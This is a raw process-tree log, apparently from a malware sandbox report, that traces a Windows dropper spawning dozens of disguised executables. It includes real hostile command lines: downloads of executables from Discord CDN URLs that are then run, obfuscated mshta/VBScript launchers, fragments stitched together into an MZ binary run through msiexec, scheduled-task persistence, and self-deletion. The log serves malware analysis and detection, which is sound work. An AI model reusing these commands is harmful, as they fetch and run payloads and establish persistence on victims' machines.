C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\wR3As23OUq8e53mcaRA_FPuS.exe"C:\Users\Admin\Pictures\Adobe Films\wR3As23OUq8e53mcaRA_FPuS.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0s6GO8qqgS7xOWfXxdlhB8L8.exe"C:\Users\Admin\Pictures\Adobe Films\0s6GO8qqgS7xOWfXxdlhB8L8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\210E.bat "C:\Users\Admin\Pictures\Adobe Films\0s6GO8qqgS7xOWfXxdlhB8L8.exe""3⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903105925021696/18.exe" "18.exe" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903166096531536/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\AppData\Local\Temp\6463\18.exe18.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\6463\Transmissibility.exeTransmissibility.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\nmDpho0Rqwv3pDRRZHOjSsDL.exe"C:\Users\Admin\Pictures\Adobe Films\nmDpho0Rqwv3pDRRZHOjSsDL.exe"2⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im nmDpho0Rqwv3pDRRZHOjSsDL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\nmDpho0Rqwv3pDRRZHOjSsDL.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im nmDpho0Rqwv3pDRRZHOjSsDL.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\kpLsXooVeYn5KXmt5cla_REP.exe"C:\Users\Admin\Pictures\Adobe Films\kpLsXooVeYn5KXmt5cla_REP.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\NQjGc9Mv6jUsTTYs2QQ03Mk5.exe"C:\Users\Admin\Pictures\Adobe Films\NQjGc9Mv6jUsTTYs2QQ03Mk5.exe"2⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\QUQj_70JzOWH0xslz_5jdVAu.exe"C:\Users\Admin\Documents\QUQj_70JzOWH0xslz_5jdVAu.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zB7_0GOQqQ5HH8ie1hSkX10G.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VNCGP.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp"C:\Users\Admin\AppData\Local\Temp\is-VNCGP.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp" /SL5="$1044C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-KML6A.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-KML6A.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\a1-9cf44-50f-afda7-f231bb4006769\Tifozhakizha.exe"C:\Users\Admin\AppData\Local\Temp\a1-9cf44-50f-afda7-f231bb4006769\Tifozhakizha.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wsxm2pk.dd4\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\1wsxm2pk.dd4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1wsxm2pk.dd4\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r144yedy.buz\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\r144yedy.buz\installer.exeC:\Users\Admin\AppData\Local\Temp\r144yedy.buz\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exeC:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe"C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ef3cpd0k.oir\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ef3cpd0k.oir\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ef3cpd0k.oir\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1avwnvob.ihf\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffbcabcdec0,0x7ffbcabcded0,0x7ffbcabcdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff664849e70,0x7ff664849e80,0x7ff664849e908⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,12543212647844390868,7679366567811291117,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8300_408890969" --mojo-platform-channel-handle=1664 /prefetch:87⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe" -u5⤵
-
C:\Users\Admin\Pictures\Adobe Films\_uDVQUp1b82oTCbuhgbaREsG.exe"C:\Users\Admin\Pictures\Adobe Films\_uDVQUp1b82oTCbuhgbaREsG.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\AZncMKOcV3N_LXTxtk8_VdBl.exe"C:\Users\Admin\Pictures\Adobe Films\AZncMKOcV3N_LXTxtk8_VdBl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\iTvAv769WTdgdqowmUVoPGOw.exe"C:\Users\Admin\Pictures\Adobe Films\iTvAv769WTdgdqowmUVoPGOw.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\pii6j3LhRjXyZzUMsP6MXCfA.exe"C:\Users\Admin\Pictures\Adobe Films\pii6j3LhRjXyZzUMsP6MXCfA.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\oDzI6pgLfFznDi2viuJtdUSc.exe"C:\Users\Admin\Pictures\Adobe Films\oDzI6pgLfFznDi2viuJtdUSc.exe"2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\svchost.exesvchost.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e6⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e7⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e8⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e9⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e25⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e26⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e27⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e28⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e29⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e30⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e31⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\nslookup.exeC:\Windows\SysWOW64\nslookup.exe32⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\w1Qr3z_UriUutAzBdJlGZleB.exe"C:\Users\Admin\Pictures\Adobe Films\w1Qr3z_UriUutAzBdJlGZleB.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\3ntxIvNO4gdqLCZTEKYoD5OS.exe"C:\Users\Admin\Pictures\Adobe Films\3ntxIvNO4gdqLCZTEKYoD5OS.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\Vr6UhpPn3vnrngst4or6bPkp.exe"C:\Users\Admin\Pictures\Adobe Films\Vr6UhpPn3vnrngst4or6bPkp.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\moY4wW3E0qIMJdKiUqS7p9LE.exe"C:\Users\Admin\Pictures\Adobe Films\moY4wW3E0qIMJdKiUqS7p9LE.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZYPtO67joxDPHN7OiyLkZikp.exe"C:\Users\Admin\Pictures\Adobe Films\ZYPtO67joxDPHN7OiyLkZikp.exe"2⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "PynfcVpLPqPvCAES36qMtTu_.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\yJvvpFMTC2oHk_J4a2l2BZEX.exe"C:\Users\Admin\Pictures\Adobe Films\yJvvpFMTC2oHk_J4a2l2BZEX.exe"2⤵
-
